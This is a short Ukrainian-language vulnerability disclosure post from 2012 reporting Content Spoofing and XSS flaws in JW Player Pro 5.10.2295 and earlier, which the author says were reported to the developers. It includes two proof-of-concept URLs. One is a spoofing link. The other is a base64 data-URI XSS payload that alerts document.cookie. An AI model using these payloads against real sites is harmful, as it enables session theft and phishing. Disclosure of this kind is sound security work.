Уразливості в JW Player Pro
23:50 23.08.2012У вересні, 12.08.2012 я виявив Content Spoofing та Cross-Site Scripting уразливості в JW Player Pro - ліцензійній версії JW Player. Які я виявив в одній комерційній CMS, в якій він використовується. Про що вже повідомив розробникам флеш додатку та розробнику CMS, де я виявив ці уразливості.
Раніше я вже писав про Content Spoofing та XSS уразливості в JW Player. В попередньому записі я згадував про дві уразливості, що стосувалися лише ліцензійної версії плеєра, а це дві нові уразливості в ній.
Content Spoofing:
http://site/player.swf?abouttext=Player&aboutlink=http://site
XSS:
http://site/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
Вразливі JW Player Pro 5.10.2295 та попередні версії (ліцензійні версії JW Player). Розробник пообіцяв мені виправити дані уразливості найближчим часом - в оновленій версії 5.10 або в 5.11.